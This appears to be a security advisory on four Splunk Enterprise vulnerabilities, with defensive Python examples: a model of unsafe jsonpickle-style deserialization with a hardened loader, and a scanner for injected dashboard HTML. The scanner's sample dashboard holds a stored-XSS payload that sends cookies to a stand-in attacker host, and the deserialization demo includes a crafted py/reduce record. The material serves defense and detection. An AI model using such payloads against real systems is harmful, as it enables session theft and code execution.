Threat Advisory

Splunk Enterprise Vulnerability Allows Arbitrary File Creation

Threat: Vulnerability
Targeted Region: Global
Targeted Sector: Technology & IT
Criticality: High

EXECUTIVE SUMMARY:

Multiple security vulnerabilities have been identified in Splunk Enterprise (versions 9.3.x through 10.4.x). The flaws span several classes: unauthenticated arbitrary file creation, remote code execution, stored cross-site scripting, and server-side request forgery. An attacker could create or truncate files on the host, execute arbitrary code, inject scripts into dashboards viewed by other users, or make the server contact internal services, potentially leading to data loss, service disruption, credential theft, and broader network compromise. Taken together, the flaws threaten the confidentiality, integrity, and availability of the logging and analytics infrastructure enterprises rely on for security monitoring.

• CVE-2026-20253 with a CVSS score of 9.8 – Unauthenticated arbitrary file creation. An attacker with network access to the vulnerable service can invoke a PostgreSQL sidecar endpoint to create or truncate arbitrary files on the host; no credentials are required.
• CVE-2026-20251 with a CVSS score of 8.8 – Remote code execution. A low-privileged authenticated user can trigger unsafe deserialization of KV Store data, handled with the jsonpickle library, in the Splunk Secure Gateway app and run arbitrary code on the host; no additional privileges are needed.
• CVE-2026-20252 with a CVSS score of 7.6 – Server-side request forgery in the Dashboard Studio PDF export feature. An attacker can make the Splunk server issue requests to internal endpoints, potentially exposing services that are not reachable from outside.
• CVE-2026-20258 with a CVSS score of 7.1 – Stored cross-site scripting. An attacker able to write to a classic dashboard can embed JavaScript in an HTML panel; it executes in the browser of every user who views that dashboard.
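The RCE item above (CVE-2026-20251) concerns jsonpickle-style deserialization of KV Store data. The Python below is an added illustration, not Splunk's or jsonpickle's code: a deliberately minimal model of how tag-driven deserializers turn JSON into live objects (a `py/function` tag resolved by import, a `py/reduce` tag calling it with attacker-chosen arguments), beside a hardened loader that treats KV Store records as data only and rejects any document carrying `py/` tags. The record contents, field names and the `os.getcwd` stand-in callable are constructed for the example; real jsonpickle handles many more tags, but the shape of the problem is the same.

```python
"""Why jsonpickle-style tags in KV Store data are dangerous, and a guard.

Added illustration, not Splunk or jsonpickle code. unsafe_restore() is a
minimal model of a tag-driven deserializer: "py/function" is resolved by
importing a module and fetching an attribute, "py/reduce" calls that
callable with arguments taken from the same untrusted document.
"""
import importlib
import json
from typing import Any

# Constructed sample records (not real Secure Gateway data). The second one
# smuggles a call to os.getcwd, a harmless stand-in for any callable.
BENIGN_RECORD = '{"_key": "abc123", "device": "phone-1", "registered": true}'
HOSTILE_RECORD = (
    '{"_key": "abc123", "device": '
    '{"py/reduce": [{"py/function": "os.getcwd"}, {"py/tuple": []}]}}'
)


def resolve_dotted(name: str) -> Any:
    """Resolve 'pkg.mod.attr' the way tag-based deserializers do."""
    module_name, _, attr = name.rpartition(".")
    return getattr(importlib.import_module(module_name), attr)


def unsafe_restore(node: Any) -> Any:
    """Model of an unsafe restorer: it trusts py/ tags found in the data."""
    if isinstance(node, list):
        return [unsafe_restore(x) for x in node]
    if not isinstance(node, dict):
        return node
    if "py/function" in node:
        return resolve_dotted(node["py/function"])
    if "py/tuple" in node:
        return tuple(unsafe_restore(x) for x in node["py/tuple"])
    if "py/reduce" in node:
        func, args = (unsafe_restore(x) for x in node["py/reduce"])
        return func(*args)  # attacker-chosen callable, attacker-chosen args
    return {k: unsafe_restore(v) for k, v in node.items()}


def hostile_device_value() -> Any:
    """What the unsafe path yields for the hostile record's 'device' field."""
    return unsafe_restore(json.loads(HOSTILE_RECORD))["device"]


def contains_pickle_tags(node: Any) -> bool:
    """True if any key anywhere in the document starts with 'py/'."""
    if isinstance(node, dict):
        return any(k.startswith("py/") or contains_pickle_tags(v)
                   for k, v in node.items())
    if isinstance(node, list):
        return any(contains_pickle_tags(x) for x in node)
    return False


def safe_load_record(raw: str) -> dict:
    """Hardened loader: plain json.loads, then refuse serializer control tags.

    Anything read back from a KV Store collection is untrusted input and is
    decoded as data only; nothing in it may select a class or a callable.
    """
    doc = json.loads(raw)
    if not isinstance(doc, dict):
        raise ValueError("record must be a JSON object")
    if contains_pickle_tags(doc):
        raise ValueError("record contains serializer control tags (py/*)")
    return doc


def is_rejected(raw: str) -> bool:
    """True if the hardened loader refuses the record."""
    try:
        safe_load_record(raw)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("unsafe path executed os.getcwd:", hostile_device_value())
    print("benign record:", safe_load_record(BENIGN_RECORD)["device"])
    print("hostile record rejected:", is_rejected(HOSTILE_RECORD))
```

The guard is the cheap part; the real fix is to stop handing KV Store content to a deserializer that can instantiate objects at all, which is what the vendor update does for the affected app.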

Together these flaws present an immediate, high-severity threat to any organization running a vulnerable Splunk Enterprise instance. Successful exploitation could destroy or alter logging data, execute attacker code on the Splunk host, and expose internal network services, undermining the incident response and compliance functions that depend on the platform. Prompt patching is essential to keep attackers from disrupting operations and compromising security monitoring.
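Classic Splunk dashboards are Simple XML in which a panel may contain a raw <html> element, which is where the stored XSS item above (CVE-2026-20258) places its script. The scanner below is an added example, not Splunk's tooling: it parses a dashboard definition and flags HTML panels whose markup contains script tags, inline event handlers, javascript: URLs or embedded frames, so defenders can hunt for content that may already have been injected. The sample dashboard, panel names and attacker URL are constructed for the example.

```python
"""Hunt classic (Simple XML) dashboards for HTML panels carrying active content.

Added example, not Splunk code. Feed it the XML of each dashboard view
(for instance the files under data/ui/views of each app).
"""
import re
import xml.etree.ElementTree as ET
from typing import List, Tuple

# Constructed sample dashboard: one benign HTML panel, two hostile ones.
SAMPLE_DASHBOARD = """<dashboard>
  <label>Ops overview</label>
  <row>
    <panel>
      <title>Notes</title>
      <html><p>Owned by the NOC team.</p></html>
    </panel>
    <panel>
      <title>Injected</title>
      <html><![CDATA[<img src=x onerror="fetch('https://attacker.example/?c='+document.cookie)">]]></html>
    </panel>
    <panel>
      <title>Link</title>
      <html><a href="javascript:alert(1)">click</a></html>
    </panel>
  </row>
</dashboard>"""

# Markup that has no business in a dashboard note panel.
SUSPICIOUS = re.compile(
    r"<\s*script\b|\bon[a-z]+\s*=|javascript\s*:|<\s*iframe\b|<\s*object\b|<\s*embed\b",
    re.IGNORECASE,
)


def panel_html_sources(xml_text: str) -> List[Tuple[str, str]]:
    """Return (panel title, raw html content) for every <html> panel element."""
    root = ET.fromstring(xml_text)
    out = []
    for panel in root.iter("panel"):
        title = (panel.findtext("title") or "").strip()
        for html in panel.findall("html"):
            # Markup may arrive as literal child elements (parsed by
            # ElementTree) or as escaped text / CDATA (kept in .text);
            # serialize both so the regex sees the same thing a browser would.
            inner = (html.text or "") + "".join(
                ET.tostring(child, encoding="unicode") for child in html
            )
            out.append((title, inner))
    return out


def find_active_content(xml_text: str) -> List[Tuple[str, str]]:
    """Return (panel title, first suspicious token) for each flagged panel."""
    hits = []
    for title, inner in panel_html_sources(xml_text):
        match = SUSPICIOUS.search(inner)
        if match:
            hits.append((title, match.group(0)))
    return hits


if __name__ == "__main__":
    for title, token in find_active_content(SAMPLE_DASHBOARD):
        print(f"panel {title!r}: suspicious token {token!r}")
```

A hit is a lead, not a verdict: legitimate dashboards occasionally carry hand-written HTML with event handlers, so compare each flagged panel against its change history and author before treating it as injected.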

RECOMMENDATION:

  • Update Splunk Enterprise to version 10.4.0 or later.
  • Until the update is applied, restrict network access to the affected Splunk services: CVE-2026-20253 requires only network reachability, not credentials.
  • Review classic dashboards for HTML panels containing script or event-handler markup, and limit dashboard edit rights to trusted users.

REFERENCES:

The following report contains further technical details:
https://securityonline.info/splunk-enterprise-vulnerabilities-cvss-9-8/
